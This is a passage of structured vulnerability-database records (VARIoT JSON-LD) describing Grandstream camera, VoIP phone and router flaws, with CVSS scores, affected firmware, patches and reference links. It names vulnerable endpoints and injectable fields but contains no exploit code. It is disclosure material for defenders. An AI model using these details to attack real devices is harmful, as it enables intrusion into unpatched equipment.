"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxv3611ir_hd_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.3.23",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxv3611ir_hd:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10660"
}
]
},
"cve": "CVE-2019-10660",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-10660",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-42876",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10660",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10660",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-42876",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1225",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42876"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"db": "NVD",
"id": "CVE-2019-10660"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1225"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXV3611IR_HD before 1.0.3.23 devices allow remote authenticated users to execute arbitrary code via shell metacharacters in the /goform/systemlog?cmd=set logserver field. Grandstream GXV3611IR_HD The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Grandstream GXV3611IR_HD is a webcam from Grandstream. \n\nThere are security vulnerabilities in Grandstream GXV3611IR_HD versions before 1.0.3.23. An attacker could use this vulnerability to execute an illegal command",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10660"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"db": "CNVD",
"id": "CNVD-2019-42876"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10660",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003012",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-42876",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1225",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42876"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"db": "NVD",
"id": "CVE-2019-10660"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1225"
}
]
},
"id": "VAR-201903-1403",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42876"
}
],
"trust": 1.1
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42876"
}
]
},
"last_update_date": "2023-12-18T12:43:35.823000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream GXV3611IR_HD command injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/192489"
},
{
"title": "Grandstream GXV3611IR_HD Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90909"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42876"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1225"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"db": "NVD",
"id": "CVE-2019-10660"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10660"
},
{
"trust": 1.6,
"url": "https://github.com/scarvell/grandstream_exploits"
},
{
"trust": 1.6,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl=1"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10660"
},
{
"trust": 0.8,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-42876"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"db": "NVD",
"id": "CVE-2019-10660"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1225"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-42876"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"db": "NVD",
"id": "CVE-2019-10660"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1225"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42876"
},
{
"date": "2019-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"date": "2019-03-30T17:29:00.603000",
"db": "NVD",
"id": "CVE-2019-10660"
},
{
"date": "2019-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1225"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-42876"
},
{
"date": "2019-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003012"
},
{
"date": "2023-03-01T14:50:08.823000",
"db": "NVD",
"id": "CVE-2019-10660"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1225"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1225"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXV3611IR_HD Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003012"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1225"
}
],
"trust": 0.6
}
}
VAR-201904-0581
Vulnerability from variot - Updated: 2023-12-18 12:43A Malformed Input String to /cgi-bin/api-get_line_status on Grandstream GXP16xx VoIP 1.0.4.128 phones allows attackers to dump the device's configuration in cleartext. Grandstream GXP16xx VoIP phone Contains an input validation vulnerability.Information may be obtained
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201904-0581",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gxp1610",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1615",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1620",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1625",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1628",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
},
{
"model": "gxp1630",
"scope": "eq",
"trust": 1.8,
"vendor": "grandstream",
"version": "1.0.4.128"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"db": "NVD",
"id": "CVE-2018-17563"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1610_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1610:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1615_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1615:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1620_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1620:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1625_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1625:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1628_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1628:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:gxp1630_firmware:1.0.4.128:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:gxp1630:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17563"
}
]
},
"cve": "CVE-2018-17563",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-17563",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-128035",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-17563",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-17563",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201904-031",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-128035",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128035"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"db": "NVD",
"id": "CVE-2018-17563"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-031"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Malformed Input String to /cgi-bin/api-get_line_status on Grandstream GXP16xx VoIP 1.0.4.128 phones allows attackers to dump the device\u0027s configuration in cleartext. Grandstream GXP16xx VoIP phone Contains an input validation vulnerability.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17563"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"db": "VULHUB",
"id": "VHN-128035"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-17563",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015194",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201904-031",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-128035",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128035"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"db": "NVD",
"id": "CVE-2018-17563"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-031"
}
]
},
"id": "VAR-201904-0581",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-128035"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:43:34.207000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Important Firmware News (HD IP Phones)",
"trust": 0.8,
"url": "http://www.grandstream.com/support/firmware"
},
{
"title": "Grandstream GXP16xx VoIP Enter the fix for the verification error vulnerability",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90943"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-031"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-311",
"trust": 1.1
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128035"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"db": "NVD",
"id": "CVE-2018-17563"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://grandstream.com/support/firmware"
},
{
"trust": 1.7,
"url": "https://iridiumxor.wordpress.com/2019/01/03/three-simple-cves-for-a-good-voip-phone/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17563"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17563"
},
{
"trust": 0.6,
"url": "http://www.iridiumxor.blog/2019/01/three-simple-cves-for-a-good-voip-phone/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128035"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"db": "NVD",
"id": "CVE-2018-17563"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-031"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-128035"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"db": "NVD",
"id": "CVE-2018-17563"
},
{
"db": "CNNVD",
"id": "CNNVD-201904-031"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-01T00:00:00",
"db": "VULHUB",
"id": "VHN-128035"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"date": "2019-04-01T21:29:25.983000",
"db": "NVD",
"id": "CVE-2018-17563"
},
{
"date": "2019-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201904-031"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-128035"
},
{
"date": "2019-05-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015194"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-17563"
},
{
"date": "2019-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201904-031"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201904-031"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXP16xx VoIP phone Input validation vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015194"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201904-031"
}
],
"trust": 0.6
}
}
VAR-202007-1329
Vulnerability from variot - Updated: 2023-12-18 12:42Grandstream GWN7000 firmware version 1.0.9.4 and below allows authenticated remote users to modify the system's crontab via undocumented API. An attacker can use this functionality to execute arbitrary OS commands on the router. Grandstream GWN7000 For firmware, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream GWN7000 is an enterprise-class multi-WAN gigabit VPN router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
